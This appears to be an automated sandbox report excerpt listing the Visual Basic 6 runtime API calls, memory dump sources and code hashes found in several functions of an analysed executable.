                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                                                  • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1066637744-0
                                                                                                                                                                                  • Opcode ID: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                                                  • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 340591075b346b5ba6fee1fbb1c14d57b1d27844eec09d86ed4196eac17be608
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                                                    • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                  • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                                                  • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                                                  • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                                                  • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                                                  • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                                                  • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                                                  • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                                                  • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                                                  • String ID: yymmdd
                                                                                                                                                                                  • API String ID: 2807397001-2871001947
                                                                                                                                                                                  • Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                                                  • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F92B
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F939
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F944
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1195834276-0
                                                                                                                                                                                  • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                                                  • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                                                                                                                                                  • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9DB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9E9
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9F4
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F9FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1195834276-0
                                                                                                                                                                                  • Opcode ID: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                                                  • Instruction ID: 19c458602e53a293f3e6311b0924b7b74753bb6bdf76692d44a87d1e904a729f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e89174baaba1573401519e836ee25ddfce7923bb9d535aed6c714f1c2090de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87019E71A00205AFCB049BB8CD4AA6F7BB8FB48740F50413AF515F32D0D73899058B99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 652 40290c-402932 #100 653 402933-402934 652->653 653->653 654 402936-402942 653->654
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: #100
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1341478452-0
                                                                                                                                                                                  • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                                                  • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E3F
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00412E47
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 00412E4B
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000101,?,00000000), ref: 00412E76
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412E89
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412E95
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412EAE
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00405CF4,?,?,00000160,00000100,?,00000000), ref: 00412EE7
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 00412EFA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00412F06
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00405CF4,?,?,?,00000000), ref: 00412F1F
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00412F30
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00412F3C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000278,?,00000000), ref: 00412F62
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,00000000), ref: 00412F71
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,0000011C,?,00000000), ref: 00412F91
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000084,?,00000000), ref: 00412FDC
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,0000008C,?,00000000), ref: 00413024
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000154,?,00000000), ref: 00413049
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,00000050,?,00000000), ref: 0041306D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004074A0,000000E0,?,00000000), ref: 004130A3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 004130C9
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000264,?,00000000), ref: 004130FE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00413110
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00413138
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041314C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041317F
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 0041320C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413234
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413252
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?), ref: 00413270
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?), ref: 004132B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132C0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132C3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132CD
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000), ref: 004132D2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132DC
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132DF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132E9
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000), ref: 004132EE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004132F8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004132FB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413305
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041332C
                                                                                                                                                                                  • #537.MSVBVM60(?,?), ref: 00413355
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041335F
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00413362
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041336C
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 00413377
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00413381
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00413384
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041338E
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 00413399
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004133A3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004133A6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004133B0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 004133D7
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413434
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413487
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041349F
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004134BF
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004134D2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413516
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00413548
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004074A0,00000284), ref: 004135CC
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413610
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413645
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413654
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413667
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041368D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004074B4,00000000), ref: 0041369E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004136D5
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 00413706
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 00413715
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413728
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413748
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00413757
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00413786
                                                                                                                                                                                  • _adj_fdiv_m64.MSVBVM60 ref: 004137B7
                                                                                                                                                                                  • __vbaR8IntI4.MSVBVM60 ref: 004137C6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004137D9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 004137F9
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041382A
                                                                                                                                                                                  • #537.MSVBVM60(00000040,00000000,?,00000008,?), ref: 004142BD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142CB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142CE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142D8
                                                                                                                                                                                  • #537.MSVBVM60(00000003,00000000,?,00000008,?), ref: 004142DD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142EB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 004142EE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 004142F8
                                                                                                                                                                                  • #606.MSVBVM60(00000012,00000008,00000000,?,00000008,?), ref: 00414304
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041430E
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000008,?), ref: 00414311
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041431B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,00000000,?,00000008,?), ref: 00414325
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000008,?), ref: 0041432F
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000033,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414498
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000009,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,00000008,?,00000008,?), ref: 004144DF
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00414AEA
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00414AFC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00414B0E
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00414B18
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00414B20
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00414B2C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00414B34
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00414B37
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00414B47
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,00414D6B,?,00000000), ref: 00414D44
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00414D53
